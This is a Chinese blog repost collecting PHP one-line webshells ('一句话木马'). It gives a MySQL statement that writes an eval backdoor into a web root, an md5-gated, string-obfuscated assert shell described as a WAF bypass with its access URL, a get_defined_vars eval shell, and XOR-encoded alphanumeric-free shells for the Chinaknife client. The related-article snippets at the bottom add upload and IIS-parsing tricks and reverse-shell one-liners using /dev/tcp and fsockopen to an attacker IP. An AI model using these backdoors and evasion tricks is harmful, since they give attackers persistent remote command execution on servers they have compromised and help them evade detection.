一句话shell【php】

最新推荐文章于 2022-04-08 00:03:09 发布
最新推荐文章于 2022-04-08 00:03:09 发布
阅读量630 收藏
点赞数
文章标签: php shell 数据库
原文链接:http://www.cnblogs.com/p0pl4r/p/10632441.html
版权

1.mysql执行语句拿shell

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');
select cmd from a into outfile 'E:\\phpStudy\\PHPTutorial\\WWW\\test.php';

 

 2.利用md5绕过waf

---------------------
本体
<?php
        $str1 = 'aH(UUH(fsdfH(UUH(fsdf,fdgdefjg0J)r&%F%*^G*t';
        $str2 = strtr($str1,array('aH(UUH(fsdfH(UUH(fsdf,'=>'as','fdgdefjg0J)'=>'se','r&%F%*^G*t'=>'rt'));
        $str3 = strtr($str2,array('s,'=>'s','fdgdefjg0J)r&%F%*^G*'=>'er'));
        if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){
                $str4 = strrev($_POST['a']);
                $str5 = strrev($str4);
                $str3($str5);
    }
?>
---------------------
本质
<?php
if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){
    assert($_POST['a']);
}
?>
------------------------
利用
.php?a=3fion0hj5965698jhh密码a

注:default失败!其他编码成功!

 

3.get_defined_vars()函数马:在过滤$的情况下可使用

<?php 
eval(get_defined_vars()['_POST']['1']);
?>

 

4.不含字母数字马

注:只能菜刀连接!

<?php
$_=(chr(0x01)^'`').(chr(0x13)^'`').(chr(0x13)^'`').(chr(0x05)^'`').(chr(0x12)^'`').(chr(0x14)^'`');
$__='_'.(chr(0x0D)^']').(chr(0x2F)^'`').(chr(0x0E)^']').(chr(0x09)^']');
$___=$$__;
$_($___['_']);// assert($_POST['_']);
?>

或者

<?php
$_=(urldecode('%01')^'`').(urldecode('%13')^'`').(urldecode('%13')^'`').(urldecode('%05')^'`').(urldecode('%12')^'`').(urldecode('%14')^'`');
$__='_'.(urldecode('%0D')^']').(urldecode('%2F')^'`').(urldecode('%0E')^']').(urldecode('%09')^']');
$___=$$__;
$_($___['_']);// assert($_POST['_']);
?>

 

https://www.freebuf.com/articles/web/173579.html

 https://mochazz.github.io/2017/12/04/bypass1/

 

转载于:https://www.cnblogs.com/p0pl4r/p/10632441.html

weixin_30497527
关注
一句话木马拿Shell与菜刀原理
悦分享
07-12 1546
1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2. 有时上传图片格式的木马,居然被程序检测拦截了,右键记事本打开木马,在代码最前面加上gif89a,再数据库备份备份成asp格式的木马拿下shell。3. 上传图片格式木马,复制地址到数据库备份备份成asp格式木马,有时不成功的话,就利用IIs6.0解析漏洞,格式:1.asp;
php一句话webshell 服务端和客户端
05-11
php一句话webshell 服务端和客户端,一句话为 <?php $_GET[2]($_GET[0]($_GET[1]));?> 支持函数system,passthru,shell_exec 可以执行操作系统任意命令,windows linux unix 等。 zhaoxypass@yahoo.com.cn,欢迎下载使用,本软件为免费版。
Linuxtone命令一句话(定期更新)
weixin_34242658的博客
06-25 236
来源:[url]http://bbs.linuxtone.org/thread-16-1-1.html[/url]作者:NetSeek 1.删除0字节文件 find -type f -size 0 -exec rm -rf {} \; 2.查看进程 按内存从大到小排列 ps -e-o "%C: %p : %z : %a"|sort -k5 -nr ...
php一句话上传webshell,一句话shell,哪些是恶意的php一句话webshell
weixin_30670745的博客
03-17 388
哪些是恶意的php一句话webshellPHP 是一种创建动态交互性站点2113的强有力的服务器端脚本语5261言。PHP 是免费的,并4102且使用广泛。对于像1653微软 ASP 这样的竞争者来说,PHP 无疑是另一种高效率的选项。PHP 是一种通用开源脚本语言。语法吸收了C语言、Java和Perl的特点,利于学习,使用广泛,主要适用于Web开发领域。shell脚本中的一句话求解释这是用了aw...
一句话shell命令
weixin_34189116的博客
10-13 204
1、清空以log文件结尾的文件内容 find.-typef-name"*.log"-execcp/dev/null{}\; 转载于:https://blog.51cto.com/caozm/1563206
一句话反弹shell
Jim的博客
08-21 4560
1.Bash: •bash–i >&/dev/tcp/10.0.0.1/80800>&1  //bash –i打开一个交互的bash, /dev/tcp建立一个socket连接, >&将标准错误输出重定向到标准输出中,0>&1将标准输入重定向到标准输出中。 •Linuxshell文件描述符: •1.标准输入:代码为0,使用 •2.标准输出:代码为1,使用>或>>; •3.标准错误输出:
php一句话cmdshell新型 (非一句话木马)
10-30
PHP 一句话 CMDShell 新型(非一句话木马)】 在 PHP 开发中,存在一种安全漏洞,称为“一句话 CMDShell”,它允许攻击者通过在 PHP 脚本中注入命令来执行系统级别的操作。虽然通常的一句话木马是直接执行 PHP ...
常用的一句话反弹shell总结
热门推荐
橘子女侠
05-20 1万+
目录 常用的一句话反弹shell总结 1. bash直接反弹 2. python一句话反弹shell 3. python脚本反弹shell 4. php一句话反弹shell 5. php脚本反弹shell 6. 使用nc命令获取靶机的反弹shell; 7. 使用Kali自带的脚本文件获取反弹shell 8. 使用msfvenom 获取一句话反弹shell 常用的一句话反弹she...
中国菜刀php一句话,中国菜刀之写一句话木马变形
weixin_39879674的博客
04-01 892
了解一句话脚本的工作原理一句话脚本的工作原理:一句话恶意脚本分析服务端与客户端。(此处以asp脚本语言简述原理)一句话恶意脚本服务端就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中pass可以自己修改一句话恶意脚本客户端(即为中国菜刀主程序)用来向服务端提交控制数据...
ASPX一句话shell客户端+ASPXshell MS08-067插件
12-28
ASPX一句话shell客户端和ASPXshell MS08-067插件是网络安全领域中与Web应用程序漏洞利用相关的工具。这两个概念主要涉及到的是ASP.NET Web应用程序的安全问题,以及如何利用这些工具进行渗透测试或者防御。 首先,...
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话拿webshell,然后用菜刀连接即可
常用一句话shell命令行
sun172270102的博客
07-09 691
1、一句话while循环 while :; do echo `data`;sleep 0.5;done 2、输出毫秒级时间 date +%Y-%m-%d ' '%H:%M:%S.%N | cut -b 1-23 3、awk命令解析shell输出 awk '{print $1,$2}' 4、排除特定目录或文件 ls | grep -v "filea \| fileb" 5、shell字符串分割 cat xxx | awk -F "-" '{print $2}' 6、xargs传参 把前序
纯符号一句话webshell PHP代码详解
abcd9com的专栏
05-24 1102
$_=""; $_[+""]=''; $_="$_".""; $_=($_[+""]|"").($_[+""]|"").($_[+""]^""); ${'_'.$_}['_'](${'_'.$_}['__']); ?> 以上是网上流传的一段由纯符号组成的一句话后门代码,这种代码混淆方法主要用以webshell免杀。下文将详细剖析这段看似复杂的PHP变形代码。 第一行:$_=""
php shell,php命令行写shell实例详解
weixin_42123191的博客
03-09 215
php 可以像java perl python 那样运行,今天发现如果我早早知道这个,或许我不会去学习java 和 python当年学java不过为了一个程序放在服务器上,不停的跑啊跑,原来 php 也可以。php -hUsage: php [options] [-f] [--] [args...]php [options] -r [--] [args...]php [options] [-B...
MSF模拟渗透测试之一句话木马拿shell
lza20001103的博客
04-08 3937
MSF模拟渗透测试之一句话木马拿shell
php渗透上传一句话,【渗透】PHPshell的经验总结(附带大马一句话马)
weixin_35683330的博客
03-19 336
手工注入笔记↓一.检测字段长度http://www.osy-wine.com/news_show.php?id=-61 order by 24 报错 说明字段长度是24查看数据库信息http://www.osy-wine.com/news_show.php?id=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20...
phpshell,phpcms怎么拿shell
weixin_33450988的博客
03-10 480
phpcms拿shell的方法:首先登录phpcms后台管理;然后依次点击“界面”->“模板风格”,并点击“详细列表”;接着点击“search”文件夹;最后修改“index.html”,并点击“可视化”即可。记一次phpcms v9后台拿shell过程登录进入后台管理后,点击界面,模板风格,然后点击祥细列表,如下图:然后点击 search 这个文件夹,如下图:然后点击修改 index.htm...
php最短一句话后门webshell
weixin_34128411的博客
09-11 1201
2019独角兽企业重金招聘Python工程师标准>>> ...
一句话反弹shell代码
最新发布
09-10
一句话反弹shell代码是一种常见的恶意代码,攻击者通常通过利用漏洞将这段代码注入到目标服务器的Web应用程序中。 以下是一个简单的一句话反弹shell代码的示例: ``` <?php $sock=fsockopen("攻击者的IP地址",攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值